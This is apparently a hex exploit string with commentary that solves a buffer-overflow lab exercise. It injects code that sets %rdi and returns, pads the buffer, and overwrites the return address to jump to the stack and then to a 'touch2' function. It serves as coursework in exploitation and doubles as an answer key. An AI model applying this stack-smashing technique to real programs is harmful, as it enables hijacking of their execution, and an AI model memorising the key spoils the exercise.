/*  Column   1  2  3  4  5  6  7  8 */ /* Line */
            48 C7 C7 FA 97 B9 59 C3    /*   1  */
            90 90 90 90 90 90 90 90    /*   2  */
            90 90 90 90 90 90 90 90    /*   3  */
            90 90 90 90 90 90 90 90    /*   4  */
            90 90 90 90 90 90 90 90    /*   5  */
            78 DC 61 55 00 00 00 00    /*   6  */
            EC 17 40                   /*   7  */  

/* the first 8 bytes are instuctions:                      */
/* 0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi    */
/* 7:	c3                   	ret                        */
/* the next 32 bytes are padding.                          */
/* you can write anything except '0A' .                    */
/* the next 8 bytes are the address of the stack top.      */
/* so the program will jump to the stack top,              */
/* where the above instructions, after 'ret' instruction.  */
/* the last 3 bytes will overwrite the original bytes.     */
/* that is the address of 'touch2' function.               */